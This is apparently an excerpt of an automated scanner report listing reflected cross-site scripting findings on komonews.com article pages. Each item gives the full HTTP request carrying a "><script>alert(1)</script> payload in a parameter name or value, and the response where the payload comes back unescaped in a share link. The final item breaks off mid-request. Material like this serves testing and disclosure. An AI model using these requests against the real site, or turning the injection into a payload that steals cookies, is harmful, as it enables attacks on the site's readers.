1.438. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116509853.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2faa"><script>alert(1)</script>b78b2637fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   With no bu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116509853.html?d2faa"><script>alert(1)</script>b78b2637fb2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.439. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116694614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac35f"><script>alert(1)</script>23fa83b97d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Police off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116694614.html?ac35f"><script>alert(1)</script>23fa83b97d8=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.440. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116703604.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e1a"><script>alert(1)</script>2036797cb5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54939


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video&26e1a"><script>alert(1)</script>2036797cb5c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.441. http://www.komonews.com/news/local/116703604.html [skipthumb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116703604.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c21"><script>alert(1)</script>c8a8d55f906 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56542


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?skipthumb=Y17c21"><script>alert(1)</script>c8a8d55f906" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.442. http://www.komonews.com/news/local/116703604.html [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116703604.html

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e25b"><script>alert(1)</script>88a93434d89 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56541


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   It's a bir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116703604.html?tab=video2e25b"><script>alert(1)</script>88a93434d89" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.443. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116706579.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cb9"><script>alert(1)</script>51a8b418a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 58421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   'I think h
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.444. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116707379.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4abb"><script>alert(1)</script>1481598e616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 61154


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Tuba Man k
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.445. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116712649.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ccc"><script>alert(1)</script>185c63b8fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53722


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Wash. bill
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.446. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116714899.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aad0"><script>alert(1)</script>aabf954c4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116714899.html?7aad0"><script>alert(1)</script>aabf954c4e2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56376


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Gay lawmak
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116714899.html?7aad0"><script>alert(1)</script>aabf954c4e2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.447. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116727124.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b481"><script>alert(1)</script>23228f2d5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 63488


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Snow begin
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.448. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116745309.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14dfb"><script>alert(1)</script>64fe1ebf191 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   No freedom
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.449. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116752479.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7da8"><script>alert(1)</script>0858a8ba4ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116752479.html?c7da8"><script>alert(1)</script>0858a8ba4ab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53652


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Overturned
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116752479.html?c7da8"><script>alert(1)</script>0858a8ba4ab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.450. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116755469.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a016a"><script>alert(1)</script>eedbf6babab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116755469.html?a016a"><script>alert(1)</script>eedbf6babab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55643


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   High-speed
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116755469.html?a016a"><script>alert(1)</script>eedbf6babab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.451. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/115640079.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>347bc1c610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Pregnant w
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.452. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/national/116404039.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49972"><script>alert(1)</script>1d3733e8d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
